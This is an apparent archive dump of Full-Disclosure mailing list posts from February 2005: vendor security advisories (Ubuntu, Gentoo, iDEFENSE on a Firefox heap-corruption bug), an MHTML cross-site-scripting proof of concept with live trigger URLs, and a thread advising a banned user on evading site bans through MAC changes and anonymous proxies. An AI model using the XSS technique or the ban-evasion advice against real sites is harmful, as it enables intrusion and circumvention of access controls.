from the Bush Campaign and the Swifties but in Ohio friends got flooded daily with saturation media N.B. I post this to full-dis and other places because it does involve disclosure of techniques about how people accomplish things in the world using information tools bob wireless internet evdo wifi hotspot guy wrote: Google has all kinds of info... they are probably the most powerful entity on this planet... i looked up google's zeitgiest and the ratio of Kerry vs. Bush Searches BEFORE the election was the margin by which Bush WON... PREDICTIVE??? absolutely. X Robert Kim, Wireless Internet Wifi Hotspot Advisor http://evdo-coverage.com http://wireless-internet-broadband-service.com https://evdo.sslpowered.com/wifi-hotspot-router.htm 2611 S Pacific Coast Highway 101 Cardiff by the Sea CA 92007 : 206 984 0880 Wireless Internet Service Is ONLY Broadband with Broadband Customer Service(tm) OUR QUEST: To Kill the Cubicle! (SM) ---Shalo -;-) - Original Message - From: Nancy Kramer [EMAIL PROTECTED] To: [EMAIL PROTECTED]; full-disclosure@lists.netsys.com Sent: Friday, February 25, 2005 12:46 PM Subject: Re: Fw: [Full-Disclosure] Google Search and Gmail Correlation If you run the Google Toolbar they do know where you have been surfing on the web. They do record it. That's how you pay for the Toolbar. Your theory sounds correct to me. Regards, Nancy Kramer ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
RE: [lists] RE: [Full-Disclosure] Awake a modem with AT commands
[EMAIL PROTECTED] wrote on 02/26/2005 07:43:02 AM: Syed Imran Ali wrote: I don't know if you specifically asked for DSL or Cable modems or what you exactly wanna do with it. As far as AT commands are your concerns, I think most of the ppl on the list can help you out. Btw, elucidate ur question please. Mr. Ali, Please be aware that action09 does not need to elucidate, as you obviously do not understand what she was saying to start with. I do not mean to mock you, but you really need to get a clue. True, my first modem was 300 baud, but if you try to issue an AT command to a DSL or cable modem, I think you will not get a response. Curt Purdy CISSP, GSEC, CNE, MCSE+I, CCDA Information Security Engineer DP Solutions Curt, do you think that maybe, just maybe, that the request Ryed made of action09 to elucidate was in fact a request for clarification? One often does that when one does not clearly understand what is being said. Maybe a little less caffeine in your diet...just a thought. Bart ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Re: Full-Disclosure Digest, Vol 3, Issue 52
L.S., Van 28 februari tot en met 4 maart ben ik afwezig. Uw mail mail is aangekomen en zal beantwoord worden vanaf 7 maart. Voor spoedeisende zaken kunt u terecht bij Gijs van Blokland. [EMAIL PROTECTED] / 020-5304323 Wiggert de Haan ISIZ BV ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [USN-89-1] XML library vulnerabilities
=== Ubuntu Security Notice USN-89-1 February 28, 2005 libxml vulnerabilities CAN-2004-0989 === A security issue affects the following Ubuntu releases: Ubuntu 4.10 (Warty Warthog) The following packages are affected: libxml1 The problem can be corrected by upgrading the affected package to version 1:1.8.17-8ubuntu0.1. In general, a standard system upgrade is sufficient to effect the necessary changes. Details follow: Several buffer overflows have been discovered in libxml's FTP connection and DNS resolution functions. Supplying very long FTP URLs or IP addresses might result in execution of arbitrary code with the privileges of the process using libxml. This does not affect the core XML parsing code, which is what the majority of programs use this library for. Note: The same vulnerability was already fixed for libxml2 in USN-10-1. Source archives: http://security.ubuntu.com/ubuntu/pool/main/libx/libxml/libxml_1.8.17-8ubuntu0.1.diff.gz Size/MD5: 361144 49c17811be2abc30c48984e0f46454fb http://security.ubuntu.com/ubuntu/pool/main/libx/libxml/libxml_1.8.17-8ubuntu0.1.dsc Size/MD5: 756 5d9e3b59a2d624d52af231926a84fb1d http://security.ubuntu.com/ubuntu/pool/main/libx/libxml/libxml_1.8.17.orig.tar.gz Size/MD5: 1016403 b8f01e43e1e03dec37dfd6b4507a9568 amd64 architecture (Athlon64, Opteron, EM64T Xeon) http://security.ubuntu.com/ubuntu/pool/main/libx/libxml/libxml-dev_1.8.17-8ubuntu0.1_amd64.deb Size/MD5: 385860 672acd61cde9389539ea2e8d68a1d2db http://security.ubuntu.com/ubuntu/pool/main/libx/libxml/libxml1_1.8.17-8ubuntu0.1_amd64.deb Size/MD5: 225922 e1f0cdc93c32b6bd256070dc45d5e2a7 i386 architecture (x86 compatible Intel/AMD) http://security.ubuntu.com/ubuntu/pool/main/libx/libxml/libxml-dev_1.8.17-8ubuntu0.1_i386.deb Size/MD5: 361434 41037748a8cb40a6bd26b0d0d5ee3387 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml/libxml1_1.8.17-8ubuntu0.1_i386.deb Size/MD5: 212158 7f149fcc590aa2162810fdae5a47cd29 powerpc architecture (Apple Macintosh G3/G4/G5) http://security.ubuntu.com/ubuntu/pool/main/libx/libxml/libxml-dev_1.8.17-8ubuntu0.1_powerpc.deb Size/MD5: 392636 b445671f31603b7e12b8c47fd7ea6697 http://security.ubuntu.com/ubuntu/pool/main/libx/libxml/libxml1_1.8.17-8ubuntu0.1_powerpc.deb Size/MD5: 220004 e3cd12326fae6972a44ac59a8af97697 signature.asc Description: Digital signature ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Possible XSS issue on Windows XPSP2 IE6 via MIME Encapsulation of Aggregate HTML
Hi, LIST. subject: Possible XSS issue on Windows XPSP2 IE6 via MIME Encapsulation of Aggregate HTML Documents NOTE: This bug had been provided by an unknown person on his site. This bug is widely known in Japan since August, 2004. (These news was reported.) Now his site is closed. Some engineers prevented this bug. They are maintaining Web services. Wiki, Webmail, Blog, BBS, those might be dangerous. First: I want to show the following first. Please checkout using IE on XPSP2. The cat is here. http://freehost02.websamba.com/bitlance/mhtmlbug/scriptkitty.jpg And the cat is a script kitty. mhtml:http://freehost02.websamba.com/bitlance/mhtmlbug/scriptkitty.jpg You see? executing JavaScript? Ok. If you are using old IE or Windows, try this one. mhtml:http://freehost02.websamba.com/bitlance/mhtmlbug/scriptkitty.jpg.mhtml Confirmed? Second: What is happen to us? Please checkout. http://dsv.su.se/jpalme/ietf/mhtml-test/mhtml-3.txt or same file, http://freehost02.websamba.com/bitlance/mhtmlbug/q1.txt This is a test messages which demonstrate of sending e-mail in HTML format according to RFC 2557. And check out please. mhtml:http://dsv.su.se/jpalme/ietf/mhtml-test/mhtml-3.txt or same file, mhtml:http://freehost02.websamba.com/bitlance/mhtmlbug/q1.txt Third: Then we can change Content-Transfer-Encoding: from '7bit' to 'quoted-printable'. Checkout please. http://freehost02.websamba.com/bitlance/mhtmlbug/q2.txt - - q2.txt -- Content-Type: text/html; charset=us-ascii Content-Transfer-Encoding: quoted-printable =3C!DOCTYPE HTML PUBLIC -//W3C//DTD HTML 3.2//EN=3E =3CHTML=3E =3CHEAD=3E=3CTITLE=3ETest message no. 3=3C/TITLE=3E =3C/HEAD=3E =3CBODY=3E =3CH1=3EThis is test message no. 3=3C/H1=3E =3CH2=3EHere comes the red test image:=3C/H2=3E =3CIMG SRC=3Dhttp://www.dsv.su.se/jpalme/mimetest/red-test-image.gif; BORDER=3D0 HEIGHT=3D32 WIDTH=3D117 ALT=3Dred test image=3E =3CH2=3EHere comes the yellow test image:=3C/H2=3E =3CIMG SRC=3Dhttp://www.dsv.su.se/jpalme/mimetest/yellow-test-image.gif; BORDER=3D0 HEIGHT=3D32 WIDTH=3D152 ALT=3Dyellow test image=3E =3CP=3EThis is the last line of this test message. =3C/BODY=3E=3C/HTML=3E - - q2.txt -- Where is HTML TAG? Do you know how to sanitise? mhtml:http://freehost02.websamba.com/bitlance/mhtmlbug/q2.txt The malicious code would be inserted by a malicious user, on Blog, Wiki, BBS with fileuploader ,etc. JPEG file or Gif file are also poisoned. There is possible XSS issue on Windows XPSP2 IE6 via MHTML. Reference: Using HTML in E-mail http://www.dsv.su.se/jpalme/ietf/mhtml.html MIME Encapsulation of Aggregate HTML Documents (MHTML) http://msdn.microsoft.com/library/default.asp?url=/library/en-us/cdosys/html/_cdosys_mime_encapsulation_of_aggregate_html_documents_mhtml_.asp RFC 2045 - Multipurpose Internet Mail Extensions (MIME) Part One: Format of Internet Message Bodies http://www.faqs.org/rfcs/rfc2045.html === Sorry my bad English. Best Regards. === -- bitlance winter _ Dont just search. Find. Check out the new MSN Search! http://search.msn.click-url.com/go/onm00200636ave/direct/01/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Xfree86 video buffering?
Le Mercredi 23 Février 2005 23:20, defiance a écrit : Seriously though, I think this has to do with stuff getting left in the video memory. I don't think X flushes it properly. I already saw this problem switching from ctrl+alt+F7 to ctrl+alt+F8 from a F7 root X session to a F8 user X session, wher the user session sees the last root screen. This seems to proove this a X behaviour problem; reboot or not, the problem is here. -- cordialement William Waisse http://neoskills.com http://waisse.org ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] Safe Run As
Safe Run As - keylogger protection This tool is created to protect administrative passwords against keyloggers. Administrator's passwords are stored in the AES encrypted file on the removalable storage (flash-drive, floppy). Then you need to use run as command you launch saferunas.hta, and provide username and encryption key. Passwords are decrypted and cmd.exe is launched with selected user's privileges. Edit.hta tool can be used to create and modify file with encrypted passwords. Attention! - This tool doesn't protect against smart malware which can copy password file and steal encryption key. - You can't choose program to run. Coming soon. - In this version password entered is used as AES key directly. This is bad idea. PKCS#5 version is coming soon. - Attention - when you run GUI application as high privileged user, you are vulnerable for Shatter-style attacks (see shatter vbs for example). http://www.security.nnov.ru/soft/srunas/ (c)oded by [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] iDEFENSE Security Advisory 02.28.05: Mozilla Firefox and Mozilla Browser Out Of Memory Heap Corruption Design Error
Mozilla Firefox and Mozilla Browser Out Of Memory Heap Corruption Design Error iDEFENSE Security Advisory 02.28.05 www.idefense.com/application/poi/display?id=200type=vulnerabilities February 28, 2005 I. BACKGROUND Mozilla is an open-source web browser, designed for standards compliance, performance and portability. Further information about the browser is available at: http://www.mozilla.org II. DESCRIPTION Remote exploitation of a design error in Mozilla 1.7.3 and Firefox 1.0 may allow an attacker to cause heap corruption, resulting in execution of arbitrary code. The vulnerability specifically exists in string handling functions, such as nsCSubstring::Append, which rely on functions in the file mozilla/xpcom/string/src/nsTSubstring.cpp. Certain functions, such as nsTSubstring_CharT::Replace() fail to check the return value of functions which resize the string. xpcom/string/src/nsTSubstring.cpp: [1] size_type length = tuple.Length(); cutStart = PR_MIN(cutStart, Length()); [2] ReplacePrep(cutStart, cutLength, length); [3] if (length 0) tuple.WriteTo(mData + cutStart, length); At [1], length is set to the length of the string to be copied, which is the passed to ReplacePrep() at [2]. If the reallocation performed by this function fails sets mData to a fixed address. mData = NS_CONST_CAST(char_type*, char_traits::sEmptyBuffer); mLength = 0; The value of sEmptyBuffer is set in xpcom/string/src/nsSubstring.cpp: static const PRUnichar gNullChar = 0; const char* nsCharTraitschar ::sEmptyBuffer = (const char*) gNullChar; As the return value is not checked, if the function fails mData is pointing at a known memory location. By causing memory to be consumed until an out of memory condition occurs, and controlling the value of the string to append, it is possible at [3] to cause arbitrary data to be placed is a known location, allowing execution of arbitrary code. This vulnerability would rely on both knowing the version of the browser, which could be obtained from the User-Agent string passed to a malicious server, and being able to cause memory exhaustion. It may be possible to cause memory exhaustion remotely by either sending a large amount of data to the client in the headers, which would require a large amount of bandwidth or by using compression to reduce the amount of data that needs to be sent to the client, either via a server module like the Apache httpd mod_deflate, or a file such as a ZIP file referenced by a jar: URI. It also may be possible to use a javascript to allocate enough memory to trigger this vulnerability. As this vulnerability is triggered in an out of memory condition, it may be easier to exploit on systems which have restricted the amount of memory a user or process may use. III. ANALYSIS Remote exploitation of this vulnerability may allow execution of arbitrary code with the privileges of the logged in user. A failed exploitation attempt may result in the browser crashing. IV. DETECTION iDEFENSE Labs have confirmed The Mozilla Organization's Mozilla 1.7.1 and 1.7.3, as well as Firefox 0.10.1 are vulnerable to this issue. A check on the source code for Firefox 1.0 suggests it is also vulnerable. It is suspected that all previous versions of both browsers are vulnerable. V. WORKAROUND iDEFENSE is currently unaware of any effective workarounds for this vulnerability. VI. VENDOR RESPONSE Vendor advisory: http://www.mozilla.org/security/announce/mfsa2005-18.html Raw bug report: https://bugzilla.mozilla.org/show_bug.cgi?id=277549 VII. CVE INFORMATION The Common Vulnerabilities and Exposures (CVE) project has assigned the names CAN-2005-0255 to these issues. This is a candidate for inclusion in the CVE list (http://cve.mitre.org), which standardizes names for security problems. VIII. DISCLOSURE TIMELINE 02/09/2005 Initial vendor notification 02/09/2005 Initial vendor response 02/28/2005 Coordinated public disclosure IX. CREDIT Gaël Delalleau is credited with discovering this vulnerability. Get paid for vulnerability research http://www.idefense.com/poi/teams/vcp.jsp Free tools, research and upcoming events http://labs.idefense.com X. LEGAL NOTICES Copyright © 2005 iDEFENSE, Inc. Permission is granted for the redistribution of this alert electronically. It may not be edited in any way without the express written consent of iDEFENSE. If you wish to reprint the whole or any part of this alert in any other medium other than electronically, please email [EMAIL PROTECTED] for permission. Disclaimer: The information in the advisory is believed to be accurate at the time of publishing based on currently available information. Use of the information constitutes acceptance for use in an AS IS condition. There are no warranties with regard to this information. Neither the author nor the publisher accepts any liability for any direct, indirect, or consequential loss or damage arising from use
Re: Fw: [Full-Disclosure] Google Search and Gmail Correlation(evgpsc verify reciept please)
Nope, But this should provide hours of amusement. Go to google and type in or copy from here: orkut +google +profile.aspx Interesting... r/ Dan Sometimes MSN E-mail will indicate that the mesasge failed to be delivered. Please resend when you get those, it does not mean that the mail box is bad, merely that MSN mail is over worked at the time. From: David Chastain [EMAIL PROTECTED] To: Ankush Kapoor [EMAIL PROTECTED] CC: full-disclosure@lists.netsys.com Subject: Re: Fw: [Full-Disclosure] Google Search and Gmail Correlation(evgpsc verify reciept please) Date: Mon, 28 Feb 2005 05:38:24 -0800 Is anyone a part of Orkut or know someone who is? On Saturday, February 26, 2005, at 03:17PM, Ankush Kapoor [EMAIL PROTECTED] wrote: Combine Google's search capabilities with Orkut, and suddenly they know so much about so many people and how they are related. Connect keyhole to that which they recently bought, and voila it could be putting spy agencies to shame after a while! regards Ankush Kapoor On Sat, 26 Feb 2005 10:40:32 -0800, Steve Kudlak [EMAIL PROTECTED] wrote: One sort of prediction does not say too much, but google has a lot of power becuase they have a lot of information.. Interesting it was very interesting to look at, although a lot of it was the power the traditional media because I could have and did ignore most of the Swifties after initial look through of their tactics which were traditional media stuff, but most people hold that someone how is real fact and truth. Interestying question is how did you take the freeform aprocach of the zzeitgeist list and get from that to an actual bwho was going to win the election? Have Fun, Sends Steve P.S. My friends in Ohio said it was very difficult to avoid the Swifties stuff if you looked at any public media. The interesting thing was the whole way I heard very little out here on the4 West Coasst from the Bush Campaign and the Swifties but in Ohio friends got flooded daily with saturation media N.B. I post this to full-dis and other places because it does involve disclosure of techniques about how people accomplish things in the world using information tools bob wireless internet evdo wifi hotspot guy wrote: Google has all kinds of info... they are probably the most powerful entity on this planet... i looked up google's zeitgiest and the ratio of Kerry vs. Bush Searches BEFORE the election was the margin by which Bush WON... PREDICTIVE??? absolutely. X Robert Kim, Wireless Internet Wifi Hotspot Advisor http://evdo-coverage.com http://wireless-internet-broadband-service.com https://evdo.sslpowered.com/wifi-hotspot-router.htm 2611 S Pacific Coast Highway 101 Cardiff by the Sea CA 92007 : 206 984 0880 Wireless Internet Service Is ONLY Broadband with Broadband Customer Service(tm) OUR QUEST: To Kill the Cubicle! (SM) ---Shalo -;-) - Original Message - From: Nancy Kramer [EMAIL PROTECTED] To: [EMAIL PROTECTED]; full-disclosure@lists.netsys.com Sent: Friday, February 25, 2005 12:46 PM Subject: Re: Fw: [Full-Disclosure] Google Search and Gmail Correlation If you run the Google Toolbar they do know where you have been surfing on the web. They do record it. That's how you pay for the Toolbar. Your theory sounds correct to me. Regards, Nancy Kramer ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html _ Express yourself instantly with MSN Messenger! Download today - it's FREE! http://messenger.msn.click-url.com/go/onm00200471ave/direct/01/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [ GLSA 200502-31 ] uim: Privilege escalation vulnerability
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200502-31 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: uim: Privilege escalation vulnerability Date: February 28, 2005 Bugs: #82678 ID: 200502-31 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis Under certain conditions, applications linked against uim suffer from a privilege escalation vulnerability. Background == uim is a simple, secure and flexible input method library. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-i18n/uim 0.4.5.1= 0.4.5.1 Description === Takumi Asaki discovered that uim insufficiently checks environment variables. setuid/setgid applications linked against libuim could end up executing arbitrary code. This vulnerability only affects immodule-enabled Qt (if you build Qt 3.3.2 or later versions with USE=immqt or USE=immqt-bc). Impact == A malicious local user could exploit this vulnerability to execute arbitrary code with escalated privileges. Workaround == There is no known workaround at this time. Resolution == All uim users should upgrade to the latest available version: # emerge --sync # emerge --ask --oneshot --verbose =app-i18n/uim-0.4.5.1 References == [ 1 ] CAN-2005-0503 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0503 [ 2 ] uim announcement http://lists.freedesktop.org/archives/uim/2005-February/000996.html Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200502-31.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 pgp1yPnmDCG1D.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] client - server
which informations can a server get about a client running M$ windows XP ? I cannot access a website because i have been banned and I'd like to understand how they recognize me for sure. All sorts of stuff. Visit browserspy (http://gemal.dk/browserspy/) for a bunch of tests. Java is one excellent way to steal the goods (and many browserspy tests use that). The 'short' answer is, however, probably a simple IP check. I mean: - a simple ip check doesn't work with dynamic addresses... - cookies can be deleted - computer name can be changed - mac address can be changed (even I wasn't able to, because I have a usb dsl modem and I cannot change its MAC working with regedit or using tools like smac ) MAC address? That's not visible past the DSLAM. As for dynamic addresses, have you kept track? I have (supposed) dynamic addresses at home and it's not changed in over a year. You should dump the DSL modem and get a conventional ethernet one. Then change the MAC on your ethernet card at will (this will get you new addresses). There probably is a way to access the innerds of the USB one but you'd probably have to take it apart and locate the serial port. ~Mike. Anything else ? How the hell do they recognize me ? Matteo Giannone 6X velocizzare la tua navigazione a 56k? 6X Web Accelerator di Libero! Scaricalo su INTERNET GRATIS 6X http://www.libero.it ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] client - server
I have made all tests on that website : none revealing informations that can recognize me. I mean: if mozilla would send its SERIAL NUMBER (if it exsts) that is a way to identify my own copy of mozilla. which informations can a server get about a client running M$ windows XP ? I cannot access a website because i have been banned and I'd like to understand how they recognize me for sure. All sorts of stuff. Visit browserspy (http://gemal.dk/browserspy/) for a bunch of tests. Java is one excellent way to steal the goods (and many browserspy tests use that). The 'short' answer is, however, probably a simple IP check. I mean: - a simple ip check doesn't work with dynamic addresses... - cookies can be deleted - computer name can be changed - mac address can be changed (even I wasn't able to, because I have a usb dsl modem and I cannot change its MAC working with regedit or using tools like smac ) MAC address? That's not visible past the DSLAM. As for dynamic addresses, have you kept track? I have (supposed) dynamic addresses at home and it's not changed in over a year. You should dump the DSL modem and get a conventional ethernet one. Then change the MAC on your ethernet card at will (this will get you new addresses). There probably is a way to access the innerds of the USB one but you'd probably have to take it apart and locate the serial port. ~Mike. Anything else ? How the hell do they recognize me ? Matteo Giannone 6X velocizzare la tua navigazione a 56k? 6X Web Accelerator di Libero! Scaricalo su INTERNET GRATIS 6X http://www.libero.it ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html Navighi a 2 MEGA e i primi 3 mesi sono GRATIS. Scegli Libero Adsl Flat senza limiti su http://www.libero.it ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
[Full-Disclosure] [ GLSA 200502-32 ] UnAce: Buffer overflow and directory traversal vulnerabilities
- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Gentoo Linux Security Advisory GLSA 200502-32 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - http://security.gentoo.org/ - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Severity: Normal Title: UnAce: Buffer overflow and directory traversal vulnerabilities Date: February 28, 2005 Bugs: #81958 ID: 200502-32 - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - Synopsis UnAce is vulnerable to several buffer overflow and directory traversal attacks. Background == UnAce is an utility to extract, view and test the contents of an ACE archive. Affected packages = --- Package / Vulnerable / Unaffected --- 1 app-arch/unace = 1.2b *= 1.2b-r1 app-arch/unace = 2.0 *= 1.2b-r1 Description === Ulf Harnhammar discovered that UnAce suffers from buffer overflows when testing, unpacking or listing specially crafted ACE archives (CAN-2005-0160). He also found out that UnAce is vulnerable to directory traversal attacks, if an archive contains ./.. sequences or absolute filenames (CAN-2005-0161). Impact == An attacker could exploit the buffer overflows to execute malicious code or the directory traversals to overwrite arbitrary files. Workaround == There is no known workaround at this time. Resolution == All UnAce users should upgrade to the latest available 1.2 version: # emerge --sync # emerge --ask --oneshot --verbose =app-arch/unace-1.2b-r1 References == [ 1 ] CAN-2005-0160 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0160 [ 2 ] CAN-2005-0161 http://www.cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-0161 Availability This GLSA and any updates to it are available for viewing at the Gentoo Security Website: http://security.gentoo.org/glsa/glsa-200502-32.xml Concerns? = Security is a primary focus of Gentoo Linux and ensuring the confidentiality and security of our users machines is of utmost importance to us. Any security concerns should be addressed to [EMAIL PROTECTED] or alternatively, you may file a bug at http://bugs.gentoo.org. License === Copyright 2005 Gentoo Foundation, Inc; referenced text belongs to its owner(s). The contents of this document are licensed under the Creative Commons - Attribution / Share Alike license. http://creativecommons.org/licenses/by-sa/2.0 pgpFAG2X7OTp3.pgp Description: PGP signature ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] client - server
It is impossible that they banned a block of addresses of my ISP, because that is a webserver where you play games: most of the people playing games there use my same ISP and also live near me. I am sure that my IP address changes in couple of hours after disconnections. I deleted cookies, changed computer name, used different browsers ActiveX controls are disabled by default on Internet explorer. I really don't understand how they can ban me. Are you all sure they cannot know my MAC address? I think they know it when I connect to the server (i remember something of TCP/IP stack and encapsulation/decapsulation) Most likely they might have blocked the entire pool of IP belonging to your ISP try to visit the website with a proxy server On Sun, 27 Feb 2005 21:29:18 -0500, Eric Windisch [EMAIL PROTECTED] wrote: On Mon, 2005-02-28 at 02:43 +0100, Matteo Giannone wrote: - a simple ip check doesn't work with dynamic addresses... It will work for as long as your IP is valid. They can also ban the entire IP block (aka, your ISP) - computer name can be changed - mac address can be changed (even I wasn't able to, because I have a usb dsl modem and I cannot change its MAC working with regedit or using tools like smac ) Your browser will not (or should not, anyway) reveal your computer name or mac address. Anything else ? User-agents and referers. Some browsers can send quite a bit of information in the user-agent string. It could also be a content filter between you and the web site in question. Schools and parents setup these to censor the surfing of children. Many companies filter their content too, due to the distraction (and legal ramifications) brought about by warez and pornography. How the hell do they recognize me ? By the tin-foil hat ;) -- Eric Windisch [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- Gautam R. Singh http://www.google.com/search?q=gautam.singh%40gmail.com [mcp,ccna,cspfa,] t: +91 9885576081 | pgp: http://gautam.techwhack.com/key/ | ymsgr: er-333 | msn: [EMAIL PROTECTED] Navighi a 2 MEGA e i primi 3 mesi sono GRATIS. Scegli Libero Adsl Flat senza limiti su http://www.libero.it ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] client - server
Are you all sure they cannot know my MAC address? I think they know it when I connect to the server (i remember something of TCP/IP stack and encapsulation/decapsulation) Only if some 3rd party application (like the game) is sending it (this is how xbox modchip users get nicked .. also using a similar trick involving the HDD serial number). If you're banned with this game (but nothing else) .. perhaps it's something involving the game's serial number? Accounts on Doom servers (and the like) have been banned in the past for a variety of reasons. If this is plane-jane HTTP, try using an anonymous proxy server to hide your address (get one from www.multiproxy.org). MAC addresses don't make it past any layer2 device (dslam is basically a fancy switch) unless you're doing something like DLSW (which being a residential DSL subscriber, you're not). ~Mike. ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] client - server
A MAC address can be queried on a windows box via the registry - if you have access. This can be done with [null] sessions and netbios. So, depending on security, connectivity, access permissions, etc - it may be possible to obtain this information. On Mon, 28 Feb 2005 11:18:49 -0500, Michael Holstein [EMAIL PROTECTED] wrote: which informations can a server get about a client running M$ windows XP ? I cannot access a website because i have been banned and I'd like to understand how they recognize me for sure. All sorts of stuff. Visit browserspy (http://gemal.dk/browserspy/) for a bunch of tests. Java is one excellent way to steal the goods (and many browserspy tests use that). The 'short' answer is, however, probably a simple IP check. I mean: - a simple ip check doesn't work with dynamic addresses... - cookies can be deleted - computer name can be changed - mac address can be changed (even I wasn't able to, because I have a usb dsl modem and I cannot change its MAC working with regedit or using tools like smac ) MAC address? That's not visible past the DSLAM. As for dynamic addresses, have you kept track? I have (supposed) dynamic addresses at home and it's not changed in over a year. You should dump the DSL modem and get a conventional ethernet one. Then change the MAC on your ethernet card at will (this will get you new addresses). There probably is a way to access the innerds of the USB one but you'd probably have to take it apart and locate the serial port. ~Mike. Anything else ? How the hell do they recognize me ? Matteo Giannone 6X velocizzare la tua navigazione a 56k? 6X Web Accelerator di Libero! Scaricalo su INTERNET GRATIS 6X http://www.libero.it ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- ME2 my home: http://www.santeriasys.net/ my photos: http://mespinola.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] client - server
What is the game? Perhaps they are blocking you by an internal User/Player ID number. I know that's how effective blocking is done in CounterStrike:Source. On Mon, 28 Feb 2005 17:49:01 +0100, Matteo Giannone [EMAIL PROTECTED] wrote: It is impossible that they banned a block of addresses of my ISP, because that is a webserver where you play games: most of the people playing games there use my same ISP and also live near me. I am sure that my IP address changes in couple of hours after disconnections. I deleted cookies, changed computer name, used different browsers ActiveX controls are disabled by default on Internet explorer. I really don't understand how they can ban me. Are you all sure they cannot know my MAC address? I think they know it when I connect to the server (i remember something of TCP/IP stack and encapsulation/decapsulation) Most likely they might have blocked the entire pool of IP belonging to your ISP try to visit the website with a proxy server On Sun, 27 Feb 2005 21:29:18 -0500, Eric Windisch [EMAIL PROTECTED] wrote: On Mon, 2005-02-28 at 02:43 +0100, Matteo Giannone wrote: - a simple ip check doesn't work with dynamic addresses... It will work for as long as your IP is valid. They can also ban the entire IP block (aka, your ISP) - computer name can be changed - mac address can be changed (even I wasn't able to, because I have a usb dsl modem and I cannot change its MAC working with regedit or using tools like smac ) Your browser will not (or should not, anyway) reveal your computer name or mac address. Anything else ? User-agents and referers. Some browsers can send quite a bit of information in the user-agent string. It could also be a content filter between you and the web site in question. Schools and parents setup these to censor the surfing of children. Many companies filter their content too, due to the distraction (and legal ramifications) brought about by warez and pornography. How the hell do they recognize me ? By the tin-foil hat ;) -- Eric Windisch [EMAIL PROTECTED] ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- Gautam R. Singh http://www.google.com/search?q=gautam.singh%40gmail.com [mcp,ccna,cspfa,] t: +91 9885576081 | pgp: http://gautam.techwhack.com/key/ | ymsgr: er-333 | msn: [EMAIL PROTECTED] Navighi a 2 MEGA e i primi 3 mesi sono GRATIS. Scegli Libero Adsl Flat senza limiti su http://www.libero.it ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html -- ME2 my home: http://www.santeriasys.net/ my photos: http://mespinola.blogspot.com/ ___ Full-Disclosure - We believe in it. Charter: http://lists.netsys.com/full-disclosure-charter.html
Re: [Full-Disclosure] Xfree86 video buffering?
